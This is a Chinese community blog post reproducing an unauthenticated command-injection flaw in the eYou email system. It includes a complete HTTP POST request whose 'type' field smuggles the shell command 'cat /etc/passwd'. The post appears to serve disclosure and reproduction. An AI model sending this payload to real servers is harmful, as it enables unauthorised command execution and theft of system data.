亿邮电子邮件系统远程命令执行漏洞 漏洞复现

举报
Vista_AX 发表于 2023/06/28 07:00:17 2023/06/28
1.9k+ 0 0
【摘要】 亿邮电子邮件系统远程命令执行漏洞 漏洞复现

01 漏洞描述

亿邮电子邮件系统是由北京亿中邮信息技术有限公司(以下简称亿邮公司)开发的一款面向中大型集团企业、政府、高校用户的国产邮件系统。未经身份验证的攻击者利用该漏洞,可通过精心构造恶意请求,使用POST方法在目标服务器执行命令,获取目标服务器权限,控制目标服务器。

02 影响范围

亿邮电子邮件系统V8.3-V8.13的部分二次开发版本

03 利用方式

image.png

POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: 127.0.0.1
Content-Length: 39
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

type='|cat /etc/passwd||'

image.png




04 修复方案

建议联系厂商获取漏洞最新状态与补丁更新:http://www.eyoumail.net/。

【声明】本内容来自华为云开发者社区博主,不代表华为云及华为云开发者社区的观点和立场。转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息,否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

作者其他文章

评论(0

抱歉,系统识别当前为高风险访问,暂不支持该操作

    全部回复

    上滑加载中

    设置昵称

    在此一键设置昵称,即可参与社区互动!

    *长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

    *长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。